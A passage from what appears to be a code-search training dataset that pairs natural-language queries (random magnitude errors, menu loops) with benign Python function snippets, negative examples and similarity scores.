'p', 'q': 'q', 'r': 'r', 's': 's', 't': 't', 'u': 'u',\r\n 'v': 'v', 'w': 'w', 'x':'x', 'y': 'y', 'z': 'z'}\r\n print(\"done\")\r\n \r\n def export_key():\r\n \"\"\"Function export key\"\"\"\r\n if(isKeyEmpty(key)):\r\n print(\"key empty\")\r\n else:\r\n return key\r\n \r\n def import_key(key2):\r\n \"\"\"Function import key\"\"\"\r\n nonlocal key\r\n if(isKeyEmpty(key2)):\r\n print(\"key is empty\")\r\n else:\r\n key=key2\r\n print(\"done\")\r\n \r\n def encoding(sentence):\r\n \"\"\"function encoding given string with the key\"\"\"\r\n sentence=list(sentence)\r\n for i in range(len(sentence)):\r\n if (sentence[i]!=' '):\r\n sentence[i]=key[sentence[i]]\r\n sentence=''.join(sentence)\r\n if(key['reverse_word']==True):\r\n splitT=tuple(sentence.split(' '))\r\n splitT=map(lambda x:x[::-1],splitT)\r\n sentence=' '.join(splitT)\r\n if(key['reverse_string']==True):\r\n splitList=sentence.split(' ')\r\n splitList=splitList[-1::-1]\r\n sentence=' '.join(splitList)\r\n return sentence\r\n \r\n def decoding(sentence):\r\n \"\"\"function decoding given string with the key\"\"\"\r\n if(isKeyEmpty(key)):\r\n return \"key empty\"\r\n helpKey=dict((y,x) for x,y in key.items())\r\n if(key['reverse_word']==True):\r\n splitT=tuple(sentence.split(' '))\r\n splitT=map(lambda x:x[::-1],splitT)\r\n sentence=' '.join(splitT)\r\n if(key['reverse_string']==True):\r\n splitList=sentence.split(' ')\r\n splitList=splitList[-1::-1]\r\n sentence=' '.join(splitList)\r\n sentence=list(sentence)\r\n for i in range(len(sentence)):\r\n if(sentence[i]!=' '):\r\n sentence[i]=helpKey[sentence[i]]\r\n sentence=''.join(sentence)\r\n return sentence\r\n\r\n def dispatch(message,var=None):\r\n \"\"\"dispatch with message passing\"\"\"\r\n if message=='set_key':\r\n set_key(var)\r\n elif message=='empty_key':\r\n empty_key()\r\n elif message=='export_key':\r\n return export_key()\r\n elif message=='import_key':\r\n import_key(var)\r\n elif message=='encoding':\r\n return encoding(var)\r\n elif message=='decoding':\r\n return decoding(var)\r\n else:\r\n print(\"Unknown message\") \r\n return dispatch",
"def _translate(self):\r\n\r\n for place, pseudo_binary in self.letters.items():\r\n for letter in self.alphabet:\r\n\r\n with open(os.path.join(self.training_data_folder, letter + '.json'), 'r', encoding = 'utf-8') as js:\r\n data = json.loads(js.read())\r\n\r\n if pseudo_binary in data:\r\n self.result[place] = letter\r\n break\r\n\r\n else:\r\n self.result[place] = '-'\r\n\r\n if not self.devmode:\r\n return 'Not solved'\r\n\r\n return ''.join(self.result.values())",
"def is_managar(window):\n enter_code = Text(Point(130,150), \"Enter Manager Code(0 if no managar):\")\n code = Text(Point(130,130),\"\")\n max_chr = Text(Point(130,110), \"Maximum character!\")\n illegal_code = Text(Point(130,110),\"Illegal Code!\")\n wrong_code = Text(Point(130,110),\"Wrong Code!\")\n\n wrong_code.setTextColor(\"red\")\n illegal_code.setTextColor(\"red\")\n max_chr.setTextColor(\"red\")\n\n enter_code.draw(window)\n code.draw(window)\n while (True):\n new_chr = window.getKey()\n max_chr.undraw()\n wrong_code.undraw()\n illegal_code.undraw()\n if new_chr == \"Return\":\n if len(code.getText()) > 4:\n max_chr.draw(window)\n wrong_code.undraw()\n if len(code.getText()) < 1:\n illegal_code.draw(window)\n wrong_code.undraw()\n if code.getText() == MANAGAR_CODE:\n return True\n if code.getText() == \"0\":\n return False\n if code.getText() != MANAGAR_CODE and len(code.getText()) > 0:\n wrong_code.draw(window)\n\n if new_chr == \"Space\":\n code.setText(code + \" \")\n if new_chr == \"BackSpace\":\n code.setText(code.getText() + new_chr)\n code = delete_chr(code)\n else:\n if len(new_chr)> 1:\n continue\n if (ord(new_chr) > 126 or ord(new_chr) < 33):\n continue\n else:\n code.setText(code.getText() + new_chr)\n if len(code.getText()) < 5:\n code.undraw()\n code.draw(window)\n else:\n max_chr.draw(window)\n code.setText(code.getText()[:-1])",
"def on_transEdit_textChanged(self):\n self.__updatePronounceButtons()\n self.__updateClearButton()",
"def cipher_feedback(self):",
"def knowledge_refresh(self):\n knowledge_len = len(self.knowledge)\n for i, sentence in enumerate(deepcopy(self.knowledge)):\n if sentence.cells != set():\n for j in range(i+1, knowledge_len):\n if self.knowledge[j].cells != set() and sentence.cells != self.knowledge[j].cells:\n if sentence.cells.issubset(self.knowledge[j].cells):\n new_set = self.knowledge[j].cells.difference(sentence.cells)\n new_count = self.knowledge[j].count - sentence.count\n if new_set != set():\n new_sentence = Sentence(cells=new_set, count=new_count)\n if not new_sentence in self.knowledge:\n self.knowledge.append(new_sentence)\n\n elif self.knowledge[j].cells.issubset(sentence.cells):\n new_set = sentence.cells.difference(self.knowledge[j].cells)\n new_count = sentence.count - self.knowledge[j].count\n if new_set != set():\n new_sentence = Sentence(cells=new_set, count=new_count)\n if not new_sentence in self.knowledge:\n self.knowledge.append(new_sentence)\n \n # remove unnecessery knowledge\n if sentence.cells == set() and sentence.known_mines() == set() and sentence.known_safes() == set():\n self.knowledge.remove(sentence)",
"def OnKeyUp(self, event):\r\n\r\n if not self._finished:\r\n\r\n # auto-grow the textctrl:\r\n parentSize = self._owner.GetSize()\r\n myPos = self.GetPosition()\r\n mySize = self.GetSize()\r\n \r\n sx, sy = self.GetTextExtent(self.GetValue() + \"M\")\r\n if myPos.x + sx > parentSize.x:\r\n sx = parentSize.x - myPos.x\r\n if mySize.x > sx:\r\n sx = mySize.x\r\n \r\n self.SetSize((sx, -1))\r\n\r\n event.Skip()",
"def determine_input_alphabet(self, reset=True):\n if reset:\n ain = set()\n else:\n ain = set(self.input_alphabet)\n\n for t in self.iter_transitions():\n for letter in t.word_in:\n ain.add(letter)\n self.input_alphabet = list(ain)",
"def modified_flag(self, event):\n text = self.get_current()\n text.modified = 1",
"def _setText(self, text):\n self.text = \"\"\n for ch in text:\n char, vertices, glyph = self._extractGlyph(ch)\n if not self.text:\n off, kern = self._updateMetric(0, char)\n if vertices is not None and not char in self.NO_GLYPH_CHARS:\n vertices['vtx'] += off + glyph['offset']\n self.allVertices = np.hstack(vertices)\n self.allIndices = self._baseInd\n self.text += char\n else:\n pos = len(self.text)\n nonGlyph = countInSet(self.text, self.NO_GLYPH_CHARS)\n # Set the metric\n off, kern = self._updateMetric(pos, char)\n if vertices is not None and not char in self.NO_GLYPH_CHARS:\n vertices['vtx'] += off + kern + glyph['offset']\n if self.allVertices is None:\n self.allVertices = np.hstack(vertices)\n else:\n self.allVertices = np.append(self.allVertices,\n vertices)\n if self.allIndices is None:\n self.allIndices = self._baseInd\n else:\n self.allIndices = np.vstack((self.allIndices,\n self._baseInd + (pos - nonGlyph) * 4))\n self.text += char\n self.setUniforms()"
] |
[
"0.6082565",
"0.57227516",
"0.5720472",
"0.5489015",
"0.5296242",
"0.5296242",
"0.52733576",
"0.52166784",
"0.521666",
"0.5161676",
"0.51242065",
"0.5092522",
"0.5079919",
"0.50704604",
"0.5066467",
"0.4993566",
"0.49751157",
"0.49563563",
"0.4953338",
"0.49358505",
"0.49318457",
"0.49247134",
"0.49169144",
"0.49114305",
"0.49006176",
"0.48997447",
"0.48785114",
"0.4875536",
"0.4874211",
"0.4869026"
] |
0.7340027
|
0
|
Return a random magnitude with the corresponding error
|
def _random_magnitude_error(self):
magnitude = random.uniform(MIN_MAG, MAX_MAG)
snr = random.uniform(MIN_SNR, MAX_SNR)
merror = snr_to_error(snr)[1] # the positive error
return magnitude, merror
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _random_error(self):\n return self._random_magnitude_error()[1]",
"def random() -> float:\n ...",
"def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]",
"def random_float():\n return (random() - 0.5) * 2",
"def random():\r\n return R.NextDouble()",
"def eff_random(eff_mean, tau_std):\n tau = (-1.0/np.log(eff_mean))/(2*np.pi)\n tau = np.random.normal(tau, tau_std)\n return np.exp(-1/(2*np.pi*tau))",
"def random_normal():\r\n return inverse_normal_cdf(random.random())",
"def mag_to_flux(m,merr):\n fluxes = np.zeros(len(m))\n fluxes_err = np.zeros(len(m))\n for i in range(len(m)):\n dist = 10**(-np.random.normal(m[i],merr[i],1000)/2.51)\n fluxes[i] = np.mean(dist)\n fluxes_err[i] = np.sqrt(np.var(dist))\n return fluxes,fluxes_err",
"def random_normal():\n return inverse_normal_cdf(random.random())",
"def testGetVegaMag(self):\n std = MKIDStd.MKIDStd()\n vegaFlux = std.load(\"vega\")\n bd17Flux = std.load(\"bd17\")\n for filter in ['U','B','V','R','I']:\n aFilter = std.filters[filter] \n mag = std.getVegaMag(vegaFlux, aFilter)\n self.assertAlmostEqual(0.03, mag, msg=\"filter=%s mag=%f\"%(filter,mag))",
"def random_vector_in_unit_ball():\n x = np.random.normal(loc=0.0, scale=1.0, size=(numSamples, self.dim))\n z = np.random.exponential(scale=1.0, size=(numSamples,))\n d = (np.sum(np.square(x), axis=1) + z) ** 0.5\n d = d[:, np.newaxis]\n return x / d",
"def pull_arm(self):\n return np.random.normal(loc = 0, scale = 1)+self.mean",
"def randerr(size=1,func='normal',**kwargs):\n kwargs.update(size=size)\n funclower = func.lower()\n if funclower in ['normal','gaussian','gauss']:\n rvs = stats.norm.rvs\n elif funclower in ['uniform']:\n rvs = stats.uniform(-1,2).rvs\n elif funclower in ['lorentzian','cauchy']:\n rvs = stats.cauchy.rvs\n elif funclower in ['delta']:\n rvs = stats.randint(1,2).rvs\n else:\n raise Exception('Unrecognized type: %s'%func)\n return rvs(**kwargs)",
"def get_mag(self):\n raise NotImplementedError",
"def testCalspecMags(self):\n std = MKIDStd.MKIDStd()\n bFilter = std.filters['B']\n vFilter = std.filters['V']\n\n # BD17\n bd17Flux = std.load(\"bd17\")\n B = std.getVegaMag(bd17Flux, bFilter)\n V = std.getVegaMag(bd17Flux, vFilter)\n self.assertAlmostEqual(B-V, 0.44, places=1, msg=\"value=%f\"%B)\n self.assertAlmostEqual(B, 9.47, places=0, msg=\"value=%f\"%B)",
"def magnitude(self):\n\t\treturn sqrt(self.dot(self))",
"def random_velocity():\n vel_dir = np.random.random(2) * 2 - 1\n vel = vel_dir * np.random.randint(2, 6)\n vel = np.where(np.abs(vel) > 1, vel, (vel / vel) * 1).astype(np.float16)\n return vel",
"def normal(mean, std):\n\n return random.gauss(mean, std)",
"def magnitude(a):\n return dot_product(a, a)**0.5",
"def _randomVelocity(self):\n\t\treturn random.choice([-1, 1]) * random.randint(10, 50)",
"def _get_gaussian_random(self):\n u1 = generateRandom()\n u2 = generateRandom()\n if u1 < 1e-6:\n u1 = 1e-6\n return sqrt(-2 * log(u1)) * cos(2 * pi * u2)",
"def mag(a):\n return sqrt(a[0]*a[0]+a[1]*a[1]+a[2]*a[2])",
"def fluxerr_to_ABmagerr(ferr, f):\n merr = (ferr/f) * (2.5/m.log(10))\n return np.fabs(merr)",
"def mag(self):\n return np.linalg.norm(self._vals)",
"def mag(self) -> float:\n return sqrt(self.sqr_mag())",
"def get_value(self) -> float:\n return random.gauss(self._mu, self._sigma)",
"def computeMagnitudeErr(instFluxErr, instFlux, calibrationErr, calibration, flux):\n return 2.5/np.log(10)*computeMaggiesErr(instFluxErr, instFlux, calibrationErr, calibration, flux) / flux",
"def exo1():\n randu = randn(N/ 2, N/ 2, 2); % a random vector field\n b = 2\n for i in 1: 4:\n LLs_u = Li{i}(LiS{i}(randu))\n % relative error should be very small\n norm(abs(LLs_u(: ) - b*randu(: )))/ norm(randu(: ))",
"def magnitude(p):\n return sqrt((p**2).sum())",
"def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]"
] |
[
"0.81969005",
"0.62485933",
"0.6231532",
"0.60908645",
"0.6088968",
"0.59982437",
"0.59946096",
"0.5939237",
"0.59085435",
"0.5882188",
"0.5876455",
"0.5862307",
"0.5852154",
"0.58491963",
"0.58294046",
"0.5827964",
"0.5806923",
"0.57921576",
"0.57457095",
"0.5741895",
"0.5741453",
"0.5739273",
"0.57330716",
"0.5712108",
"0.5699169",
"0.56875855",
"0.56433505",
"0.5642692",
"0.56406116",
"0.5630641"
] |
0.8595285
|
0
|
Return a random error in magnitudes
|
def _random_error(self):
return self._random_magnitude_error()[1]
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _random_magnitude_error(self):\n magnitude = random.uniform(MIN_MAG, MAX_MAG)\n snr = random.uniform(MIN_SNR, MAX_SNR)\n merror = snr_to_error(snr)[1] # the positive error\n return magnitude, merror",
"def random() -> float:\n ...",
"def random_float():\n return (random() - 0.5) * 2",
"def random():\r\n return R.NextDouble()",
"def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]",
"def exo1():\n randu = randn(N/ 2, N/ 2, 2); % a random vector field\n b = 2\n for i in 1: 4:\n LLs_u = Li{i}(LiS{i}(randu))\n % relative error should be very small\n norm(abs(LLs_u(: ) - b*randu(: )))/ norm(randu(: ))",
"def random_normal():\r\n return inverse_normal_cdf(random.random())",
"def expected_error(noise_param, states):\n\n from math import comb\n import preferences\n\n comparison_errors = [\n preferences.comparison_error(\n state / states,\n noise_param\n )\n for state in range(1, states)\n ]\n\n n_choose_2 = comb(states, 2)\n\n expected_error = 0.0\n for i, p in enumerate([(states - x)/n_choose_2 for x in range(1, states)]):\n expected_error += p * comparison_errors[i]\n\n return round(expected_error, 3)",
"def safe_rand(self):\n rand_n = np.random.rand()\n if rand_n == float(1):\n rand_n -= 1e-10\n return rand_n",
"def time_to_failure():\r\n return random.expovariate(BREAK_MEAN)",
"def _get_gaussian_random(self):\n u1 = generateRandom()\n u2 = generateRandom()\n if u1 < 1e-6:\n u1 = 1e-6\n return sqrt(-2 * log(u1)) * cos(2 * pi * u2)",
"def calc_error_dist(self):\n pass",
"def randerr(size=1,func='normal',**kwargs):\n kwargs.update(size=size)\n funclower = func.lower()\n if funclower in ['normal','gaussian','gauss']:\n rvs = stats.norm.rvs\n elif funclower in ['uniform']:\n rvs = stats.uniform(-1,2).rvs\n elif funclower in ['lorentzian','cauchy']:\n rvs = stats.cauchy.rvs\n elif funclower in ['delta']:\n rvs = stats.randint(1,2).rvs\n else:\n raise Exception('Unrecognized type: %s'%func)\n return rvs(**kwargs)",
"def get_sqrt_2():\n return 1.41421356",
"def random_normal():\n return inverse_normal_cdf(random.random())",
"def normal_probability(a):\n x = a * SQRTH\n z = np.abs(x)\n \n if z < SQRTH:\n y = 0.5 + 0.5 * error_function(x)\n else:\n y = 0.5 * error_function_complemented(z)\n if x > 0:\n y = 1.0 - y\n return y",
"def eff_random(eff_mean, tau_std):\n tau = (-1.0/np.log(eff_mean))/(2*np.pi)\n tau = np.random.normal(tau, tau_std)\n return np.exp(-1/(2*np.pi*tau))",
"def mag(self) -> float:\n return sqrt(self.sqr_mag())",
"def gmae(self) -> float:\n return _geometric_mean(np.abs(self._error()))",
"def mag(a):\n return sqrt(a[0]*a[0]+a[1]*a[1]+a[2]*a[2])",
"def standardError(self):\n return math.sqrt(self.standardError2())",
"def time_to_failure():\n return int(random.expovariate(BREAK_MEAN))\n #return MTBF",
"def rvs(self):\n return float(self.interp(random.rand()))",
"def random_vector_in_unit_ball():\n x = np.random.normal(loc=0.0, scale=1.0, size=(numSamples, self.dim))\n z = np.random.exponential(scale=1.0, size=(numSamples,))\n d = (np.sum(np.square(x), axis=1) + z) ** 0.5\n d = d[:, np.newaxis]\n return x / d",
"def rmse(actual, predicted):\n rms = (actual-predicted)**2\n\n # Returning the sqaure root of the root mean square\n return float(np.sqrt(rms.mean()))",
"def calculateErrorRate(numCorrect, numWrong):\n return np.round((numWrong)/(numCorrect+numWrong),3)",
"def std_err(p_hat, n):\n\n return np.sqrt((p_hat)*(1-p_hat)/n)",
"def rmspe(self) -> float:\n return float(np.sqrt(np.mean(np.square(((self.true - self.predicted) / self.true)), axis=0)))",
"def rand_uni_val() -> float:\n return random.uniform(0, 1)",
"def rsr(self) -> float:\n return float(self.rmse() / np.std(self.true))"
] |
[
"0.81952596",
"0.6543351",
"0.6431196",
"0.6320314",
"0.6304057",
"0.6242931",
"0.6069427",
"0.60419965",
"0.6036287",
"0.60287774",
"0.60102165",
"0.6001173",
"0.5979543",
"0.5971652",
"0.5969251",
"0.5958259",
"0.59394056",
"0.591453",
"0.5869372",
"0.5855773",
"0.58526",
"0.58367014",
"0.5824888",
"0.58241856",
"0.5816158",
"0.5785741",
"0.57799447",
"0.5774071",
"0.57546157",
"0.57535374"
] |
0.82927364
|
0
|
Return a random float in the range [MIN_WEIGHT, MAX_WEIGHT]
|
def _random_weight(self):
return random.uniform(MIN_WEIGHT, MAX_WEIGHT)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def random_weight():\n # We found that random.randrange(-1,2) to work well emperically \n # even though it produces randomly 3 integer values -1, 0, and 1.\n return random.randrange(-1, 2)\n\n # Uncomment the following if you want to try a uniform distribuiton \n # of random numbers compare and see what the difference is.\n # return random.uniform(-1, 1)",
"def random_float():\n return (random() - 0.5) * 2",
"def weighted_bright():\n return np.random.choice(\n [17, 18, 19, 20, 21] * 1 +\n [22, 23, 24, 25, 26] * 2 +\n [27, 28, 29, 30, 31] * 3\n )",
"def weighted_random_item(items, weight):\n if not items:\n return None\n\n weight_sum = sum(weight(item) for item in items)\n if weight_sum <= 0:\n return None\n\n choice = random.random() * weight_sum\n for item in items:\n choice -= weight(item)\n if choice < 0:\n return item, weight(item) / weight_sum\n return items[-1], -1 # floating-point rounding error",
"def float(self, max_=None):\n max_ = self.max_float if max_ is None else max_\n return max_ * (self.rng.random() - 0.5)",
"def sample_from(self, weights):\n total = sum(weights)\n rnd = total * random.random() # uniform between 0 and total\n for i, w in enumerate(weights):\n rnd -= w # return the smallest i such that\n if rnd <= 0:\n return i # weights[0] + ... + weights[i] >= rnd",
"def weightGenerate(self):\n\t\tfor i in range(0, self.numberOfInput):\n\t\t\tself.weight.append(random.random()-0.5)",
"def pick_weighted(weights, vals, eps=1.0e-4):\n\t\n\tweightSum = cumsum(weights)\n\tif weightSum[-1] == 0:\n\t\treturn random.choice(vals)\n\tif abs(weightSum[-1]-1.0) > eps:\n\t\traise RuntimeError(\"Weights don't sum to 1\")\n\tr = random.uniform(0.0,1.0)\n\tfor v,w in zip(vals, weightSum):\n\t\tif r > w:\n\t\t\tcontinue\n\t\treturn v\n\treturn vals[-1]",
"def _generate_weights(self):\n weights = [random.uniform(0, 1) for x in range(self.num_weights)]\n return self._normalize_weights(weights)",
"def random() -> float:\n ...",
"def weighted_choice(items: List[Tuple[str, float]]) -> str:\r\n total_weight = sum(item[1] for item in items)\r\n n = random.uniform(0, total_weight)\r\n for item, weight in items:\r\n if weight > n:\r\n return item\r\n n -= weight\r\n return item",
"def weighted_choice(items):\n weight_total = sum((item[1] for item in items))\n n = random.uniform(0, weight_total)\n for item, weight in items:\n if n < weight:\n return item\n n = n - weight\n return item",
"def _weighted_choice(self, lst):\n \n total_weight = reduce(lambda x,y:x+y, [tup[1] for tup in lst])\n n = random.uniform(0, total_weight)\n for item, weight in lst:\n if n < weight:\n break\n n = n - weight\n return item",
"def weighted_choice(items):\n weight_total = sum((item[1] for item in items))\n n = random.uniform(0, weight_total)\n for item, weight in items:\n if n < weight:\n return item\n n = n - weight\n return item",
"def weightedrandomchoice(items): # {{{2\n total = 0\n items.sort(reverse=True, key=lambda x:x[0])\n for item in items:\n total += item[0]\n threshold = random.uniform(0, 0.6) * total\n for item in items:\n threshold -= item[0]\n if threshold <= 0:\n return item[1]",
"def _rand_float(self, low, high):\n\n return self.np_random.uniform(low, high)",
"def random_weights(Graph,percision=3):\r\n percisionStr = \"{\"+\"0:.{}f\".format(percision)+\"}\"\r\n float(percisionStr.format(random.random()))\r\n Graph.es['weight'] = [float(percisionStr.format(random.random())) for i in range(Graph.ecount())] \r\n return Graph",
"def select(weights):\n r = random.random() * sum(weights)\n s = 0.0\n for k,w in enumerate(weights):\n s += w\n if r <= s:\n return k\n raise RuntimeError(\"select WTF from %s\" % weights)",
"def weightedChoice(weights, objects, apply_softmax=False, alpha=None):\n if apply_softmax: weights = softmax(weights)\n if alpha: weights = normalize([w**alpha for w in weights])\n cs = np.cumsum(weights) #An array of the weights, cumulatively summed.\n idx = sum(cs < np.random.rand()) #Find the index of the first weight over a random value.\n idx = min(idx, len(objects)-1)\n return objects[idx]",
"def randomize(self):\n self.weights = np.random.rand(*self.weights.shape) - 0.5",
"def test_node_weight_range_max(self):\n n = Node(inputs=3)\n for i in n.weights:\n self.assertLess(i, 0.1)",
"def weighted_choice(weights):\n totals = []\n running_total = 0\n\n for w in weights:\n running_total += w\n totals.append(running_total)\n\n rnd = random.random() * running_total\n for i, total in enumerate(totals):\n if rnd < total:\n return i",
"def WeightInitializer():\n return np.random.uniform(-1, 1)",
"def sample_float(self, start, end, step):\n self.minimum = start\n self.maximum = end\n return random.sample(list(np.arange(start, end, step)), k=self._sample_size)",
"def random_float(low: float, high: float):\n seed = time.time()\n random.seed(seed)\n return random.uniform(low, high)",
"def test_node_weight_range_min(self):\n n = Node(inputs=6)\n for i in n.weights:\n self.assertGreaterEqual(i, -0.1)",
"def random_temp():\n temp_min = 154\n temp_max = 500\n temp_interval = 1\n # `range`s are exclusive [min, max)\n return random.randrange(temp_min, temp_max + 1, temp_interval)",
"def mutate(weights,gen):\n mutated_weights = []\n for weight in weights:\n new_weight = np.random.normal(loc=weight, scale=0.5/(gen+1))\n if new_weight >= -1 and new_weight <= 1:\n mutated_weights.append(new_weight)\n elif new_weight < -1:\n mutated_weights.append(-1)\n else:\n mutated_weights.append(1)\n return np.array(mutated_weights)",
"def weighted_choice(weighted_items, num_items=1):\n total = 0\n cume_list = []\n\n for item, weight in weighted_items.items():\n total += weight\n cume_list.append([item, total])\n\n for pair in cume_list:\n pair[1] /= total\n\n items = []\n\n for _ in range(num_items):\n rand = random()\n\n for item, val in cume_list:\n if rand <= val:\n items.append(item)\n break\n\n assert num_items == len(items), (weighted_items, items)\n\n if num_items == 1:\n return items[0]\n\n return items",
"def he_uniform(weight_shape):\n if len(weight_shape) == 4:\n fW, fH, fC, _ = weight_shape\n return np.random.uniform(-np.sqrt(6 / (fW*fH*fC)), np.sqrt(6 / (fW*fH*fC)), weight_shape)\n num_input, _ = weight_shape\n return np.random.uniform(-np.sqrt(6 / num_input), np.sqrt(6 / num_input), weight_shape)"
] |
[
"0.7570449",
"0.70938075",
"0.7011047",
"0.6810181",
"0.6796796",
"0.6776659",
"0.67762464",
"0.6731501",
"0.67143947",
"0.66815233",
"0.664851",
"0.66397256",
"0.66202104",
"0.6619948",
"0.65967226",
"0.6577365",
"0.6533013",
"0.6486401",
"0.6468668",
"0.64540213",
"0.64516544",
"0.6439352",
"0.64017135",
"0.637879",
"0.63544",
"0.6324905",
"0.6317377",
"0.62981325",
"0.62717575",
"0.6269453"
] |
0.84455985
|
0
|
This is used to quickly jump to the Start Menu Loop from the Code Explorer
|
def STARTMENU_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def start(self):\n self.menu()",
"def goto_menu(self, *args):\n self.manager.current = 'Main Menu'\n self.reset()\n self.manager.reset()",
"def home(self):\n self.goto(0, 0)",
"def start(self):\n op = self.menu()\n self.opcoes(op)\n if op != \"q\" and op != \"w\":\n self.start()",
"def start(self) -> None:\n self.execute_startup_menu()\n self.execute_main_menu()",
"def start():\r\n window = loop_menuDolar()\r\n window.close()",
"def return_menu(self):\n while True:\n number = pyip.inputNum(\"0. Back to the main menu: \")\n if number == 0:\n # Clean up the console\n self.clear_console()\n # back to the main menu\n self.run()\n else:\n print('Press the number zero to go back')",
"def menu():\n menu = 'main'\n while 1:\n if menu == 'main':\n click.echo('Main menu:')\n click.echo(' d: debug menu')\n click.echo(' q: quit')\n char = click.getchar()\n if char == 'd':\n menu = 'debug'\n elif char == 'q':\n menu = 'quit'\n else:\n click.echo('Invalid input')\n elif menu == 'debug':\n click.echo('Debug menu')\n click.echo(' b: back')\n char = click.getchar()\n if char == 'b':\n menu = 'main'\n else:\n click.echo('Invalid input')\n elif menu == 'quit':\n return",
"def __continue(self, *args):\n return Menu.CONTINUE",
"def jump(self):\n print(\"Inside ElfRider.jump\")",
"def menu(self):\n from mainmenu import Menu\n gm = Menu(self.screen)\n gm.run()",
"def start(self):\n print(\"*\"*20)\n print(\"*\" + \" \"*18 + \"*\")\n print(\"*\" + \" \"*4 + \"Connect 4X\" + \" \"*4 + \"*\")\n print(\"*\" + \" \" * 18 + \"*\")\n print(\"*\" * 20)\n print(\"\\nConsole Version 1.0.0\\n\")\n self.print_menu()\n self.get_input()",
"def main_menu_for_testing():\n print(PROMPT_TEXT)",
"def action_goto(self):\n dialog = GoToDialog(self)\n dialog.exec()\n\n # Re-focus the main window\n self.activateWindow()",
"def print_main_menu():\n print(\"\\nWelcome to the Zendesk Ticket Viewing System!\\nInstructions:\")\n print(\"~ Enter '1' to view all tickets\")\n print(\"~ Enter '2' to view a certain ticket\")\n print(\"~ Enter '3' to view these options again\")\n print(\"To exit the ticketing system enter 'quit'\")",
"def start_module():\n\n while True:\n handle_menu()\n try:\n if choose() == 0:\n break\n except KeyError as err:\n ui.print_error_message(str(err))",
"def start_module():\n\n while True:\n handle_menu()\n try:\n if choose() == 0:\n break\n except KeyError as err:\n ui.print_error_message(str(err))",
"def go_to_start(self):\n self.go_to(0)",
"def goto(self, item):\n command = 'goto ' + str(item)\n self.run_command(command)",
"def startapp(self, command):\n e = self.emu\n e.alt(\"F2\")\n e.shortwait()\n e.clickat(self.screen.center)\n e.shortwait()\n e.type(command + \"\\n\")\n e.longwait()",
"def main():\n st.sidebar.title(\"Menu\")\n selection = st.sidebar.radio(\"Go to\", list(PAGES.keys()))\n\n page = PAGES[selection]\n\n with st.spinner(f\"Loading {selection} ...\"):\n ast.shared.components.write_page(page)",
"def goToFirstFrame():\n nuke.frame(int(nuke.root()[\"first_frame\"].getValue()))",
"def onClick(self):\n self.app.setActiveMode(\"start\")",
"def main():\n run_it = tools.Control(prepare.ORIGINAL_CAPTION)\n state_dict = {\"SPLASH\" : splash.Splash(),\n \"MENU\" : menu.Menu(),\n \"DEMO\" : demo.Demo(),\n \"GAME\" : game.Game()}\n run_it.setup_states(state_dict, \"SPLASH\")\n run_it.main()",
"def restart_menu(self):\n self.__show_menu = True",
"def start_menu() -> None:\n option_list = (\"1\", \"new game\", \"2\", \"load game\", \"3\", \"help\", \"4\", *exit_list)\n print(MenuSprites.start_menu)\n\n while (selection := input(\">\").lower()) not in option_list:\n print(f\"Invalid selection: {selection}\")\n\n selection = selection.lower()\n\n if selection in [\"1\", \"new game\"]:\n inv.state.new_player()\n return main_menu()\n\n elif selection in [\"2\", \"load game\"]:\n inv.load()\n return main_menu()\n\n elif selection in [\"3\", \"help\"]:\n pass\n\n elif selection in [\"4\", *exit_list]:\n quit()",
"def frame(self):\n self.run_command('frame')",
"def help_menu():\n print('\\n##################################################')\n print('################ Help Menu ###############') \n print('##################################################')\n print(' Type move or examine for each turn') \n print(' If moving, type up, down, left, or right')\n print(' If examining, you may need to answer yes or no')\n print('##################################################\\n')\n title_screen_selections()",
"def point_of_interest():\n for fi in inspect.stack()[1:]:\n if fi.function == '_run':\n # go all the way up to server start func\n break\n\n file = Path(fi.filename)\n\n # print line num, index, func name & locals for each frame.\n log(f'[{fi.function}() @ {file.name} L{fi.lineno}:{fi.index}] {fi.frame.f_locals}', Ansi.LBLUE)\n\n msg = '\\n'.join((\n \"Hey! If you're seeing this, osu! just did something pretty strange,\",\n \"and the gulag devs have left a breakpoint here. We'd really appreciate \",\n \"if you could screenshot the data above, and send it to cmyui, either via \",\n \"Discord (cmyui#0425), or by email ([email protected]). Thanks! 😳😳😳\"\n ))\n\n printc(msg, Ansi.LRED)\n input('To close this menu & unfreeze, simply hit the enter key.')",
"def main():\n # Add your main code here\n display_menu()\n pass"
] |
[
"0.71798974",
"0.6878403",
"0.6776373",
"0.6688196",
"0.650974",
"0.64464825",
"0.64293313",
"0.64215064",
"0.63442796",
"0.63122696",
"0.62531924",
"0.62444067",
"0.6239972",
"0.62016857",
"0.6131184",
"0.6120715",
"0.6120715",
"0.6086501",
"0.60707784",
"0.60664964",
"0.6022832",
"0.6016421",
"0.60147756",
"0.5975118",
"0.5972612",
"0.5965154",
"0.5952914",
"0.5944758",
"0.59188116",
"0.59087193"
] |
0.7082131
|
1
|
This is used to quickly jump to the Options Loop from the Code Explorer
|
def OPTIONS_LOOP():
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def OnButtonOptionsHelpButton(self, event):\r\n\t\twebbrowser.open(consts.URL_HELP_OPTIONS)",
"def display_other_options():\n print(\"> - Next Song page.\")\n print(\"< - Previous song page.\")\n print(\"q - to quit\")",
"def help_opt(self):\n print(OPTIONS)",
"def help_select(self):\n print(SELECT)",
"def basic_menu(dict_of_options, back=False):\n choose = True\n dict_of_options = final_option(dict_of_options, back)\n list_of_options = list(dict_of_options.keys())\n\n while choose:\n print('The following options are available:\\n')\n for option in enumerate(list_of_options):\n print('\\t{} - {}'.format(option[0], option[1]))\n pick = input('\\nType the numeric code you wish to run\\n\\n')\n if pick in [str(i) for i in range((len(dict_of_options)))]:\n choose = dict_of_options[list_of_options[int(pick)]]()\n else:\n print('{} is not currently an option!\\n'.format(pick))",
"def quick_test():\n do_command('Help: Command=Help')\n do_command('Help: Command=\"GetInfo\"')\n #do_command('SetPreference: Name=GUI/Theme Value=classic Reload=1')",
